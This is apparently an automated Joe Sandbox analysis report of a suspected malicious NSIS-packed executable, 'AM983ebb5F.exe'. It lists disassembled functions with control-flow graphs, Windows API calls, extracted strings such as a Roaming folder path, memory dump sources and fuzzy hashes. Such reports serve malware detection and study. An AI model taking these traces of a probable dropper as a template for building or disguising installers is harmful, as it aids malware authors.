                                                                                    • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405D0D
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                    • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                    • API String ID: 2035342205-1741179443
                                                                                    • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                    • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                    • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                    • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 765 4068b4-4068c8 FindFirstFileW 766 4068d5 765->766 767 4068ca-4068d3 FindClose 765->767 768 4068d7-4068d8 766->768 767->768
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                    • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nsuD53D.tmp, xrefs: 004068B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp
                                                                                    • API String ID: 2295610775-2591292428
                                                                                    • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                    • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                    • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                    • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 202 403fd7-403fe9 203 404150-40415f 202->203 204 403fef-403ff5 202->204 205 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 203->205 206 4041ae-4041c3 203->206 204->203 207 403ffb-404004 204->207 209 404203-404208 call 404522 206->209 210 4041c5-4041c8 206->210 211 404006-404013 SetWindowPos 207->211 212 404019-404020 207->212 226 40420d-404228 209->226 214 4041ca-4041d5 call 401389 210->214 215 4041fb-4041fd 210->215 211->212 217 404022-40403c ShowWindow 212->217 218 404064-40406a 212->218 214->215 242 4041d7-4041f6 SendMessageW 214->242 215->209 225 4044a3 215->225 219 404042-404055 GetWindowLongW 217->219 220 40413d-40414b call 40453d 217->220 222 404083-404086 218->222 223 40406c-40407e DestroyWindow 218->223 219->220 227 40405b-40405e ShowWindow 219->227 230 4044a5-4044ac 220->230 231 404088-404094 SetWindowLongW 222->231 232 404099-40409f 222->232 229 404480-404486 223->229 225->230 235 404231-404237 226->235 236 40422a-40422c call 40140b 226->236 227->218 229->225 238 404488-40448e 229->238 231->230 232->220 241 4040a5-4040b4 GetDlgItem 232->241 239 404461-40447a DestroyWindow EndDialog 235->239 240 40423d-404248 235->240 236->235 238->225 244 404490-404499 ShowWindow 238->244 239->229 240->239 245 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 240->245 246 4040d3-4040d6 241->246 247 4040b6-4040cd SendMessageW IsWindowEnabled 241->247 242->230 244->225 274 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 245->274 275 40429d-4042a2 245->275 249 4040d8-4040d9 246->249 250 4040db-4040de 246->250 247->225 247->246 252 404109-40410e call 4044af 249->252 253 4040e0-4040e6 250->253 254 4040ec-4040f1 250->254 252->220 257 404127-404137 SendMessageW 253->257 258 4040e8-4040ea 253->258 254->257 259 4040f3-4040f9 254->259 257->220 258->252 260 404110-404119 call 40140b 259->260 261 4040fb-404101 call 40140b 259->261 260->220 271 40411b-404125 260->271 270 404107 261->270 270->252 271->270 278 4042e3-4042e4 274->278 279 4042e6 274->279 275->274 280 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404318-404329 SendMessageW 280->281 282 40432b 280->282 283 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 281->283 282->283 283->226 294 404376-404378 283->294 294->226 295 40437e-404382 294->295 296 4043a1-4043b5 DestroyWindow 295->296 297 404384-40438a 295->297 296->229 299 4043bb-4043e8 CreateDialogParamW 296->299 297->225 298 404390-404396 297->298 298->226 300 40439c 298->300 299->229 301 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->225 301->225 306 404447-40445a ShowWindow call 404522 301->306 308 40445f 306->308 308->229
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                    • ShowWindow.USER32(?), ref: 00404033
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                    • DestroyWindow.USER32 ref: 00404072
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                    • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                                                                    • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                    • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                    • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 121052019-0
                                                                                    • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                    • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                    • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                    • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 309 403c29-403c41 call 40694b 312 403c43-403c53 call 40649e 309->312 313 403c55-403c8c call 406425 309->313 322 403caf-403cd8 call 403eff call 405f2e 312->322 317 403ca4-403caa lstrcatW 313->317 318 403c8e-403c9f call 406425 313->318 317->322 318->317 327 403d6a-403d72 call 405f2e 322->327 328 403cde-403ce3 322->328 333 403d80-403da5 LoadImageW 327->333 334 403d74-403d7b call 406594 327->334 328->327 329 403ce9-403d11 call 406425 328->329 329->327 336 403d13-403d17 329->336 338 403e26-403e2e call 40140b 333->338 339 403da7-403dd7 RegisterClassW 333->339 334->333 340 403d29-403d35 lstrlenW 336->340 341 403d19-403d26 call 405e53 336->341 352 403e30-403e33 338->352 353 403e38-403e43 call 403eff 338->353 342 403ef5 339->342 343 403ddd-403e21 SystemParametersInfoW CreateWindowExW 339->343 347 403d37-403d45 lstrcmpiW 340->347 348 403d5d-403d65 call 405e26 call 406557 340->348 341->340 346 403ef7-403efe 342->346 343->338 347->348 351 403d47-403d51 GetFileAttributesW 347->351 348->327 355 403d53-403d55 351->355 356 403d57-403d58 call 405e72 351->356 352->346 362 403e49-403e63 ShowWindow call 4068db 353->362 363 403ecc-403ecd call 4056af 353->363 355->348 355->356 356->348 368 403e65-403e6a call 4068db 362->368 369 403e6f-403e81 GetClassInfoW 362->369 366 403ed2-403ed4 363->366 370 403ed6-403edc 366->370 371 403eee-403ef0 call 40140b 366->371 368->369 374 403e83-403e93 GetClassInfoW RegisterClassW 369->374 375 403e99-403ebc DialogBoxParamW call 40140b 369->375 370->352 376 403ee2-403ee9 call 40140b 370->376 371->342 374->375 379 403ec1-403eca call 403b79 375->379 376->352 379->346
                                                                                    APIs
                                                                                      • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                      • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                    • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",00008001), ref: 00403CAA
                                                                                    • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\erstatningsgraden,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                    • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D48
                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\erstatningsgraden), ref: 00403D91
                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\erstatningsgraden$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-2535878264
                                                                                    • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                    • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                    • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                    • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                                                                    Control-flow Graph

                                                                                    (rendered graph of the function at 00403082; the node and edge list behind the figure is omitted)
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AM983ebb5F.exe,00000400), ref: 004030AF
                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 0040604B
                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AM983ebb5F.exe,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 004030FB
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\AM983ebb5F.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\AM983ebb5F.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-1577082933
                                                                                    • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                    • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                    • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                    • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

                                                                                    Control-flow Graph

                                                                                    (rendered graph of the function at 00406594; the node and edge list behind the figure is omitted)
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066B6
                                                                                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004066CC
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 0040672A
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 0040675E
                                                                                    • lstrlenW.KERNEL32(: Completed,00000000,antholite,?,?,00000000,00000000,00424620,74DF23A0), ref: 004067B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                    • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antholite
                                                                                    • API String ID: 4024019347-2831730964
                                                                                    • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                    • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                    • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                    • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

                                                                                    Control-flow Graph

                                                                                    (rendered graph of the function at 004032B9; the node and edge list behind the figure is omitted)
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: *B$ FB$ A$ A$... %d%%
                                                                                    • API String ID: 551687249-3833040932
                                                                                    • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                    • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                    • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                    • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                                                                    Control-flow Graph

                                                                                    (rendered graph of the function at 00401774; the node and edge list behind the figure is omitted)
                                                                                    APIs
                                                                                    • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017B5
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\erstatningsgraden,?,?,00000031), ref: 004017DA
                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
